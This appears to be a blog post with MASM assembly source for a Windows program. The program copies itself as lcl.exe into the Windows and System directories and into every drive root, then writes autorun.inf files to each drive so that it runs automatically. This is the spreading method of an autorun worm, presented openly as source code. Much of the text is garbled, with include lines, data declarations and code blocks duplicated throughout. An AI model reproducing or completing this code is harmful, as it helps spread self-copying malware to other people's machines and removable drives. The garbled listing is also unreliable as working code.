;made by correy
;Email:leguanyuan@126.com
;QQ:112426112
;rc me.rc
;ml /coff test.asm /link /subsystem:windows me.res
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
includelib user32.lib
includelib kernel32.lib
;Email:leguanyuan@126.com
;QQ:112426112
;rc me.rc
;ml /coff test.asm /link /subsystem:windows me.res
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
includelib user32.lib
includelib kernel32.lib
.data
correy db "made by correy",0
lcld db "lcl.exe",0
lcl db "\lcl.exe",0
autorun db "autorun.inf",0
szFilter DB "*.*",0
correy db "made by correy",0
lcld db "lcl.exe",0
lcl db "\lcl.exe",0
autorun db "autorun.inf",0
szFilter DB "*.*",0
.data?
it dd ?
buffer DB 256 DUP (?)
buffercopy DB 105 DUP (?)
drives dd ?
lcli DB 256 DUP (?)
hfile dd ?
n dd ?
windir DB 512 DUP (?)
sysdir DB 512 DUP (?)
tmpdir DB 512 DUP (?)
az DB 512 DUP (?)
bufferx DB 256 DUP (?)
it dd ?
buffer DB 256 DUP (?)
buffercopy DB 105 DUP (?)
drives dd ?
lcli DB 256 DUP (?)
hfile dd ?
n dd ?
windir DB 512 DUP (?)
sysdir DB 512 DUP (?)
tmpdir DB 512 DUP (?)
az DB 512 DUP (?)
bufferx DB 256 DUP (?)
.code
start:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;复制自己到指定的文件夹中
invoke GetCommandLine
mov it,eax
;invoke MessageBox,0,it,addr correy,0
;要去掉两个引号。
invoke lstrcpy,addr buffer,it
;invoke MessageBox,0,addr buffer,addr correy,0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;复制自己到指定的文件夹中
invoke GetCommandLine
mov it,eax
;invoke MessageBox,0,it,addr correy,0
;要去掉两个引号。
invoke lstrcpy,addr buffer,it
;invoke MessageBox,0,addr buffer,addr correy,0
invoke lstrlen,it
mov n,eax
mov ecx,eax
;想在这儿一次复制成功,理论上可以现实中却不行
;sub ecx,2
mov n,eax
mov ecx,eax
;想在这儿一次复制成功,理论上可以现实中却不行
;sub ecx,2
inc it
mov esi,it
mov edi,offset buffer
;cld
rep movsb
mov eax,offset buffer
add eax,n
sub eax,3;真奇怪,是3运行成功,调试出错;换成2调试成功,运行出错。
mov byte ptr [eax],0
;invoke MessageBox,0,addr buffer,addr correy,0
mov esi,it
mov edi,offset buffer
;cld
rep movsb
mov eax,offset buffer
add eax,n
sub eax,3;真奇怪,是3运行成功,调试出错;换成2调试成功,运行出错。
mov byte ptr [eax],0
;invoke MessageBox,0,addr buffer,addr correy,0
;备份一份
invoke lstrcat,addr buffercopy, addr buffer
;invoke MessageBox,0,addr buffercopy,addr correy,0
invoke lstrcat,addr buffercopy, addr buffer
;invoke MessageBox,0,addr buffercopy,addr correy,0
invoke GetWindowsDirectory,addr windir,sizeof windir
invoke lstrcat,addr windir,addr lcl
invoke CopyFile,addr buffer,addr windir,0
invoke lstrcat,addr windir,addr lcl
invoke CopyFile,addr buffer,addr windir,0
invoke GetSystemDirectory,addr sysdir,sizeof sysdir
invoke lstrcat,addr sysdir,addr lcl
;invoke MessageBox,0,addr sysdir,addr correy,0
invoke CopyFile,addr buffer,addr sysdir,0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;求磁盘的数量
invoke GetLogicalDriveStrings,sizeof buffer,addr buffer
mov ebx,offset buffer
xor esi,esi
jmp nextd
invoke lstrcat,addr sysdir,addr lcl
;invoke MessageBox,0,addr sysdir,addr correy,0
invoke CopyFile,addr buffer,addr sysdir,0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;求磁盘的数量
invoke GetLogicalDriveStrings,sizeof buffer,addr buffer
mov ebx,offset buffer
xor esi,esi
jmp nextd
incdrives:
inc esi
add ebx,4
inc esi
add ebx,4
nextd:
;invoke MessageBox,0,ebx,ebx,0
cmp dword ptr [ebx],0
jne incdrives
;invoke MessageBox,0,ebx,ebx,0
cmp dword ptr [ebx],0
jne incdrives
mov drives,esi
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;复制自身到每个磁盘的根目录下。
mov edi,drives ;此处用ecx与edx都不行
sub edi,1;为啥减去1呢?
mov esi,offset buffer
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;复制自身到每个磁盘的根目录下。
mov edi,drives ;此处用ecx与edx都不行
sub edi,1;为啥减去1呢?
mov esi,offset buffer
addde:
;invoke MessageBox,0,esi,addr correy,0
;invoke MessageBox,0,esi,addr correy,0
;invoke GetDriveType,esi
;cmp eax,DRIVE_FIXED
;jne nextt
;cmp eax,DRIVE_FIXED
;jne nextt
mov eax,[esi]
mov dword ptr az,eax
mov dword ptr az,eax
invoke lstrcat,addr az,addr lcld
;invoke MessageBox,0,addr az,addr correy,0
invoke CopyFile,addr buffercopy,addr az,0
;invoke MessageBox,0,addr az,addr correy,0
invoke CopyFile,addr buffercopy,addr az,0
;nextt:
add esi,4
dec edi
cmp edi,0
jne addde
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;在临时目录里面建立autorun.inf文件。
invoke GetTempPath,sizeof tmpdir,addr tmpdir
invoke lstrcat,addr tmpdir,addr autorun
;invoke MessageBox,0,addr tmpdir,addr correy,0
add esi,4
dec edi
cmp edi,0
jne addde
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;在临时目录里面建立autorun.inf文件。
invoke GetTempPath,sizeof tmpdir,addr tmpdir
invoke lstrcat,addr tmpdir,addr autorun
;invoke MessageBox,0,addr tmpdir,addr correy,0
;FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_READONLY or FILE_ATTRIBUTE_SYSTEM or FILE_FLAG_WRITE_THROUGH
;FILE_ATTRIBUTE_NORMAL
;FILE_ATTRIBUTE_TEMPORARY or FILE_FLAG_WRITE_THROUGH or FILE_FLAG_DELETE_ON_CLOSE
invoke CreateFile,addr tmpdir,GENERIC_READ or GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov hfile,eax
invoke WriteFile,hfile,addr correy,sizeof correy,addr bufferx,0
;invoke MessageBox,0,addr correy,addr correy,0;此语句是调试语句
invoke FlushFileBuffers,hfile
invoke CloseHandle,hfile
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;在每个磁盘的根目录下建立autorun.inf,以便自动运行。
mov edi,drives ;此处用ecx与edx都不行
sub edi,1;为啥减去1呢?
mov esi,offset buffer
;FILE_ATTRIBUTE_NORMAL
;FILE_ATTRIBUTE_TEMPORARY or FILE_FLAG_WRITE_THROUGH or FILE_FLAG_DELETE_ON_CLOSE
invoke CreateFile,addr tmpdir,GENERIC_READ or GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov hfile,eax
invoke WriteFile,hfile,addr correy,sizeof correy,addr bufferx,0
;invoke MessageBox,0,addr correy,addr correy,0;此语句是调试语句
invoke FlushFileBuffers,hfile
invoke CloseHandle,hfile
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;在每个磁盘的根目录下建立autorun.inf,以便自动运行。
mov edi,drives ;此处用ecx与edx都不行
sub edi,1;为啥减去1呢?
mov esi,offset buffer
addd:
;invoke MessageBox,0,esi,addr correy,0
;invoke MessageBox,0,esi,addr correy,0
;invoke GetDiskFreeSpace,esi,0,0,addr n,0
;cmp n,9
;jb nexttf
;cmp n,9
;jb nexttf
mov eax,[esi]
mov dword ptr az,eax
mov dword ptr az,eax
invoke lstrcat,addr az,addr autorun
invoke MessageBox,0,addr az,addr correy,0
invoke CopyFile,addr tmpdir,addr az,0
invoke MessageBox,0,addr az,addr correy,0
invoke CopyFile,addr tmpdir,addr az,0
;nexttf:
add esi,4
dec edi
cmp edi,0
jne addd
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ret
end start
add esi,4
dec edi
cmp edi,0
jne addd
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ret
end start
没有评论:
发表评论